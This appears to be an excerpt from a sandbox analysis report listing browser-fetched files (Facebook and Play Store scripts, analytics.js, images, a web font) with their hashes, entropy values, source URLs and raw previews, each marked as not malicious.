                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsBrowserExtensionErrorUtils",["isFalsey"],(function(a,b,c,d,e,f,g){"use strict";var h="chrome-extension://";function a(a){a=a.split(h);a=a[a.length-1];return a.split("/")[0]}function b(a){return!c("isFalsey")(a)&&a.indexOf(h)>-1}g.CHROME_EXTENSION=h;g.extractExtensionID=a;g.isBrowserExtensionError=b}),98);.__d("LaminarDebugger",["EventEmitter"],(function(a,b,c,d,e,f,g){"use strict";var h="DEBUGGER";a=function(){function a(){this.$1=[],this.$6={},this.$3=100,this.$2=new Array(this.$3),this.$4=new(c("EventEmitter"))(),this.$5=!1}var b=a.prototype;b.getDebuggerActionDispatchQueue=function(){return this.$2};b.addSnapshotToDebuggerActionDispatchQueue=function(a){this.$6=a.newState,this.$4.emit(h,a),this.$2.push(a),this.$2.shift()};b.updateCaptureRate=function(a){a>0&&(this.$2.length+=a-this.$3,this.$3=a)};b.addDebugListener=function(a){return this.$4.addListener(h,a)};b.removeAllDebugListeners=function(){this.$4.removeAllListeners(h)};b.getPauseActionDispatches=fun
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):74176
                                                                                                                                                                                                                                  Entropy (8bit):7.9956452812069765
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:1536:Gs0Bn7m1EWnnvkinvpFgcEvXdwgGkEHDotAuZnlOHghbh5tBOCYMj:kyVvkGhFgXvXygFQoNtkEh5uCR
                                                                                                                                                                                                                                  MD5:92D639281E9F4208F083A85CA8CEDFC9
                                                                                                                                                                                                                                  SHA1:7F0E13C4BF4EAA97E2964B425D95C639F9C9F244
                                                                                                                                                                                                                                  SHA-256:4CF59358414C932FD436A5720B7C3E5B87E41C2A88C93CF76445374F8E639039
                                                                                                                                                                                                                                  SHA-512:012C2FF6C60C48E847FA9FE0B67531801570612F0682C9D8D39A0FE046E1C4CA6C68B7D90297D7F46B5C0A95BCCA56E562240F8E0CD0D27E96D9061E042398DA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.!..WEBPVP8L.!../..?.M@.d.n3..x.#.....O.....y.?...".{v.[.$)3...~.s3....v.&.H."l.j.$.../.wOuf.[.b...ve~..D..Tu%...~..1...u.][.u.#.~. ...S_...4Ii..V}1..}..a....'.m...........J...km..)IyN.....t.]3G-i.;.G~.....:m.{...1s/$.....x.83c...b.3.}.......Y>..|..9.@@......... .~.E..zp......(.(@J>%]d.9.m..bg_...T2.FV..}8.L...~!O...Ng^..-(H.s..$.tw...."..9o......].....z...{....!....&Y....>.....s..-U..F..MO.3..<..Y.,!../B....!~...My..Um..i. ..&|..sg....Q.W...J..L.A.c.1...moZ.=...."...xx2.....\.'@B&..?..)J....B..........6..B@D...E..X.R...U..R4R<Z..9;.!...B."...:.<..]R.H$`..!.H..!.DB..........zW.I.J.z.)...'.......!...1.njS].....B.G..4.p.T.m..xJ..`....I=.|......f......^....O...K73....K,Q....O}4..r*p..7...P.w.s..!s...Q|..d......y>jw... ......X...9.gN.*...|..Q.v.N~......|.......dI7.Q..w.>d:l,......'.*8.P.X..J.Bz.|xs...)%.w.4..8....f.............n.u.,.s.p..r..S1....I9^..*V..`.,.d+....E{f=.U....JJ..m..e8..j..z\...X....k.../<..S........9.....\.J9.....a..e..... ...K.)
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 720x352, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46200
                                                                                                                                                                                                                                  Entropy (8bit):7.9955704705259585
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:9BueLEuAAOchHt+Zlfl+DfOIC95tpWT06ISQffs0nEEsjvaGFZIfes+rdUX6qcGD:PueJAahHt+ZlAjOXVYlyEEYvzZ5dUXlh
                                                                                                                                                                                                                                  MD5:912E5E91C9202A2D5433564D1D9091C4
                                                                                                                                                                                                                                  SHA1:DFA408003ECD5E844841D6E92E80B040E9139F6F
                                                                                                                                                                                                                                  SHA-256:84CAFC0A14060976134E63A4F407E482D5473BB429187F00DBE56258D304A9A0
                                                                                                                                                                                                                                  SHA-512:792A2CBD0A48765C1A43540BF2097098BA001B5A1DA054ABDA797DDED0BBD57365CB08787099699471738566F55983921E7F73A582EAB83CA7914B469C2C9437
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFp...WEBPVP8 d........*..`.>U$.E#.!%)4....cm....P{c...e.q>v.-+..W.w....%.~?.........K...y....._...?....../V_.....{......S.......=....<........g.....{...............~.......................g.......x........c...;....7.z.2.....5.7.7O..........._a.....O........S...........o...?...?z....~...lh..h..F....L.I.......X]:N.....R..81"W1/.4...!.......-..b...c.Yqp.2........!D.,=.b.po.;..."....7..1_.P..+"T.....v#e.'...r..qN..P.....?..f...P..}B]ZX....Gz....&......0.M...*4&LK#~.{.H\.r~....R-..*:.....Qpm8..;..;.]..^......).v...d.S.......`.r`..%..IM#W.....n..........=l%..$&..Tr.!.B3L.&J3..sM.%m.o.e.?f...Yt.b.3Aw;........=...%.%...9.,.d..@.&*.khV.&...9.cO^.,...d.B...k..XGb........97.......p<.^.H..ZB..a....ou...w.......Ma......aD.......R......$A'g../la..7Db...\F.s...-..$..:.B.jQ....}..L.....8^.N`.C ..i..k..N.....S...Y.F..4.u..I_...d3.k..WT....0.......+]:%..AVZ.f.U.[...\|\`....-...%..<.O...U..{}2.a........Xg.....Uu........'.t...^xg.x.B]...~..........:.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):17070
                                                                                                                                                                                                                                  Entropy (8bit):7.988317321389732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:wOHhhNqlo9N9XwqApqnM4040og7PlW0JQLa+X:wYNiol1443QR2pX
                                                                                                                                                                                                                                  MD5:C019051EE1A7C6FB5FC8B600A0DA1C1E
                                                                                                                                                                                                                                  SHA1:2978F635256666B167EBF7E3687AA82CD25EF9AD
                                                                                                                                                                                                                                  SHA-256:17DF26601D1C695DAD42B960143B0830B9DA296356D0B0997CC910F40AE363C3
                                                                                                                                                                                                                                  SHA-512:3C392A3FE58032E38143043CC216593650014CF9B571BFCF76890133FC408113FE9AC83AF81F8649FF9D69FBEA19C2A8C8CE3CD562B53F2BD7649BCB20D12BF3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/L4G1Qonz3vmIv5d5fD6sF7P5_hHrjbPSMdNGcV7PuYhT7KGKmPp3es6EI0XpQaa7WIA=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF.B..WEBPVP8 .B.......*..(.>M .E".!... (..o..Q.....Mo...e..y....t.._c....Og..?....g.....?......l...v.E~..........}...7.../M/d..Oa...M..O..._.l}...{.........Z..........?p.........a.3..._..t?.....^....G.O...[.7%..z.{.......y..|S....N.............o.?]..j..3.............'}U...?.w._....~Q|.{...........0.....],88.D.C@.L~.......V ..3._zP.....Z....o|_p^..a.7..K.w..C..F... D....]....f.z,....9...............sFD..7.}\9.[.].E..*..9......O.M........".lrG...rz...).r.m.../.K5.......q....l...]F...@-k..Z*.........S....1@}-...XB..."I.d. S-.L..%V.H....!D.+...T..z[i..K.g...".h?.Ac.5G!.}.a.G...b..-M.x[l..2...O..1.+...N.....v..#z-....G.O.nP.Q..w.2(....s....=.G.oOg..v.-.+V,e.....6R..).....7.!:O.:L.M.....{=.6.........1..Ii.....}M...,.Y.kz.+.\.&)....e.pq.j...Q4:....6r.Y...is..R.......d.....BO.......]%;6S..NCQ.Z...+.$....~...W...c.V....+B1.}..9.....?D*g...W[.S..'....K....... .B..T9o....s9..Mb...tg...y.:.l....Q..&...<L=.].FE..>..0?m....Q)3EM.....?}......<....FJ..=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6016
                                                                                                                                                                                                                                  Entropy (8bit):7.931230609029136
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:VKPMNbu1/GzZgw2MUe5N4iL+IdSHgwg/CPD5TreJ7xlVmhx1a2sKdNJVwJ49fDfx:APMQ1/k3h5F+1uCP1c73Ve7aEnwa5DWw
                                                                                                                                                                                                                                  MD5:2EDBD2236163FCACA2E6ADD4655EB2D8
                                                                                                                                                                                                                                  SHA1:785170958CE759A39179424E02914DCF04511957
                                                                                                                                                                                                                                  SHA-256:6253D1FE8F45FC5B01DCCA1DB4854CD8BB819389A848978791AC1D3FF98102EE
                                                                                                                                                                                                                                  SHA-512:3E5DE01D3B3E0E6F44FD006085CBA1863291CE52D1C9C07088EA1B15CAF273B47C96E11F7101428F87F2AA1116AF73D31F9E87F1F6E05CB3E24839AC37703E54
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR..............X......sRGB........:IDATx..].UU..wDD.DD..ADoA..D/EO.....C/}.C.IA..EPY.AE...d..=....6j..**~.u.8*......(......(t.q.z....?.^...r.....k........t....*.7JdV..l.d.....H.K..xd&<..z.MzJ7$CW......O....?..s.o..V.....'...6.A.4..]j....2I.w...h...lR\...?S....^...=.....' (IC.J......j....g..2..H...s..) (Nu.3.Jd~...SLr...qg..-Pz.f.h..i.2)}....XEER.k....=.....M. ...)...f.._.T4...h...A..$I.z..s...3....Y...[..6.sws.......p=x.y.........||....A.6...}...*.......T.."&x..W....W...C>U.x..Q.\...Pm........{L*}P.f..h..u(y.8K.,...."zB.....-.v$..!@3Bh".B.P.../..8..YM<..|......8y..5...y.:...JF.R}.."./gP4 ..#..x..S.>d..Ks......W~..qNN..`.AS..{..n\.m.)...&...S@./.=2..JUd...|-......@.@Q..g)......T.!C}...4.d....i.24...U>.....y....".+G....k...h9..G.x.J.......Of.pU]..]^......I...5dm2g..(Bf....k....-.c.H.....d..&.d.GH...g.~.*..Ri.. .._..".#]q}p.v..)>L..A..R.<I...>..#....=.......3I.k.....0.H..W.....3....*..U?..sA.MWy..-9?X .2...._....n.A.....S8....ZJ&...J.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 211 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5200
                                                                                                                                                                                                                                  Entropy (8bit):7.9274026492660745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rmf2rbOyPJ9hYAZBwj7T0vNwTdXcavRFbmI870JyBd8cHxm3irUovLQ+PqXF:rM2HOw9hRZu8v+THKvDHHxm3tojbyV
                                                                                                                                                                                                                                  MD5:71D6B687C90A54B1B86E17D906BA33CD
                                                                                                                                                                                                                                  SHA1:5DAB0FD4A2C06A7D49125C0954486A4321939605
                                                                                                                                                                                                                                  SHA-256:7308556C17835FEE3648F14C2B0E23026F81946842889B4586BEFCB5910E19A0
                                                                                                                                                                                                                                  SHA-512:0A925171EF387F880FD33995350873E9C7992FED89CC1688C9E4C2618B049B7C68CCEFB6F8E56490AC7C8C71D43665CF462E0AB9E8F779492C6D93F12C01785D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.............r......sRGB.........IDATx...p\.u...7.u_.IH....2..i.2y.$$...:.&$....@.dRh...dx......J..W,..d...l.,Y.w..%Y...V..J..z...q.Xw.>.{....g..-y......s......f..."$......I.Hz..Vw.*...^,...k.8.$.u.8..........N....@X...5....^%m...@..P.zC.{..cg.]....@d.o.c...S....G.CA..F......(.V.-.h.K....LXkfl....._.5.m..x.#.&...vk..\g.)..1..........Sf.c..sZI.8.....`.{.............E.L.."O!........~l....E.....L.@....".k..O...`..{..............bI{.g.|..;.t.5.....K`.h.K..r?9L..Y.X......i.{...v|/.7......=.. .E....b.7.Ax.O..j.....=..0%#.&...H......nY.......\..["...+x.W#...P....h.No.X{...)x.Gl...K.am3_....[.V..3x.ug8g..%.!]h.......E.ph..2..{.c.<x.~.phn%m!.F.6O....v..'].KQ&/...>8..K......*..t.2@......H.I7....~v.=.... .W..`%..A ..!ZE..Ic.......S.".Mt...GuW.R0.......SA....Yo..L.1z....)..d....UVu4.bI....}.I...S.gG.1V..gT=.(.OPt....tbI....l....x.>>d&<.c...t.M./..gXZZ.~ml|....\.....d.N..t.i.s.F........=.y..9....Y.....t6j....rHU..#H.!.3.,C t.Rl.....P..l..i.!.gU...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1315
                                                                                                                                                                                                                                  Entropy (8bit):6.699572044474413
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:L5Y6JIZ663SuWh8I+pCLmPQnTbBeX/7vetxw9LIQnJkKk0c:LEZ6mSuU89tPQT9y7R9TJk7
                                                                                                                                                                                                                                  MD5:AC1E1C4D6F16359701B059ED4E8246B4
                                                                                                                                                                                                                                  SHA1:FF19B30A3B3D8D1765C239B25DBC98CB3263786A
                                                                                                                                                                                                                                  SHA-256:45444D590A67D30E8B2FDE01BB6482F829383B64BF14A4B19B86E22FDC319FBB
                                                                                                                                                                                                                                  SHA-512:97E16A8A20E00FA17BEB11A5C77768F9FA42E1BD6B797DEB1FAB0A5B477C036A29E1785AA92947264F2E5972C05887969948F43FF4E69D4320A9BEB4B1664831
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xgVgalBG80z.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...................aPLTEGpL...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E.B.....tRNS..5.Pp.H../.)..hL.M.>a1.3..' -......g@......Z.Yi.....\Q.I.WueU..;.[..?...wyn..}.7z:.=....s..d,.+*".%.....K.A2.C..E.m..kD.ql..Gov.J..t........O#....4]_.B6.Sc...9..R8{...`....<....~............^sx.m....IDAT(.c`....N/q...[y.d...=.Ds...|jF.................X`....}3.g..$....U .arN...x..T....(d+V.7.......kq.N.'g........~...M..9.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):52916
                                                                                                                                                                                                                                  Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                  MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                  SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                  SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                  SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (508)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1347
                                                                                                                                                                                                                                  Entropy (8bit):5.328908510659996
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kz8S0W2NFUse3RrIqWEGTZfYM4M5sNIvWFoEJOZXeZuorl:k8FvXEC1COsXNrl
                                                                                                                                                                                                                                  MD5:5FAE4038F5A018D6C4E8492373074696
                                                                                                                                                                                                                                  SHA1:B59FD1C317D61B59A49294033C21D067E3E97F71
                                                                                                                                                                                                                                  SHA-256:290BFD02F4B8BC366146BAC70C8C9FC6DEC13B4FEEEB188D8E268CEE3CA04541
                                                                                                                                                                                                                                  SHA-512:B7B8D130EFEA0BA01D6B24B997BE57AD892AD3B4BE3A12A9A845029504EF4D190C132D13121D3766CCAAAA6D894636AFB4799368CE30DDE10BC8C1D034ECF21A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,C7s1K,CKm2Wb,CR2XMb,CvxVpd,DRmmld,EEDORb,EFQ78c,ElYdAc,FCpbqb,FoxcOd,FuzVxc,G2gJT,GjTCAc,GkRiKb,Grlxwe,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,J22eF,JH2zc,JNoxi,JWUKXe,JiSSTb,KUM7Z,Kfp2G,L1AAkb,LCkxpb,LEikZe,LRovxc,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkbkFd,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PAQZbb,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,Qf3l6c,QxNhAd,RBsfwb,RMhBfe,RQJprf,RjJvI,RqjULd,SWD8cc,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,WhJNk,Wt6vjf,XMEW5d,XVMNvd,Y413Bc,YTx6oe,Z5uLle,Z5wzge,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aTwUve,aW3pY,aurFic,baVq7b,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fI4Vwc,fKUV3e,fPcQoe,fdeHmf,fl2Zj,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,hhhU8,iAQMie,iLGjNb,ilIwyd,indMcf,j9sf1,jX6UVc,jZ2Ncd,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lDZ2Fb,lazG7b,lpwuxb,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,mzLjxc,n73qwf,nKuFpb,nQqY4c,o6xa3b,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,q8s33d,qczJ2b,qfGEyb,qk5AGd,qqarmf,qyd4Kb,rpbmN,s39S4,sJhETb,sOXFj,soHxf,t1sulf,t7vw0b,tBvKNb,tKHFxf,uj8DUc,vNKqzc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,wxpxie,xI1uef,xQtZb,xUdipf,xii62b,yABLaf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zBPctc,zbKb5e,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=GG0PW"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.uAa=_.B("GG0PW",[_.vk,_.Dj]);._.u("GG0PW");.var s5=class extends _.ys{static Ia(){return{model:{component:_.nr},service:{window:_.tr}}}constructor(a){super(a.ta);const b=a.service.window.Bc();this.body=_.un(b.body);this.ka=b.documentElement.dir==="rtl";this.Ob=a.model.component;this.H=_.eh(this.Ob.getParams(_.r5),1);this.UG=0;_.Qk(this,_.lr(this.Ob).then(({Xr:c})=>{this.UG=c.oj().length-1}))}ua(){this.body.Cb("overflow","hidden");this.Qa("c4YZDc").focus()}na(a){a=a.event;if(a?.key===void 0)return!0;switch(a.key){case "ArrowLeft":this.ka?this.N():.this.V();break;case "ArrowRight":this.ka?this.V():this.N();break;case "Escape":this.close();break;default:return!0}return!1}V(){this.H<=0||(this.H--,_.mr(this.Ob,_.jDc(new _.r5,this.H)))}N(){this.H>=this.UG||(this.H++,_.mr(this.Ob,_.jDc(new _.r5,this.H)))}close(){this.ma().remove();this.body.Cb("overflow","")}};_.V(s5.prototype,"TvD9Pc",func
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15552, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15552
                                                                                                                                                                                                                                  Entropy (8bit):7.983966851275127
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                                                                  MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                  SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                  SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                  SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                  Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):337
                                                                                                                                                                                                                                  Entropy (8bit):5.144404685488444
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnQYZojYAuGNG/QVI32TKhiRANMwQRaNw6JpyxZRNlad0:kRZTFfZOI/AIGoiukbRN20
                                                                                                                                                                                                                                  MD5:D03BC53CDB48C0376A23B20D1EF421E3
                                                                                                                                                                                                                                  SHA1:245303874D8525008CCE05DF43682A7B7FB70D26
                                                                                                                                                                                                                                  SHA-256:D96BE73454C76FD9EDBE8D1BA4F10C894C6BFA723730606E03013D7EAE47C66D
                                                                                                                                                                                                                                  SHA-512:050AE8E9C1BDF67C0029A242840842918FC09CEEC14773565CDA51A9386DCD604124BFB73D1D6E008BA3667EE0874D1861FAB396AB0AD449DD4A378BC520DE76
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
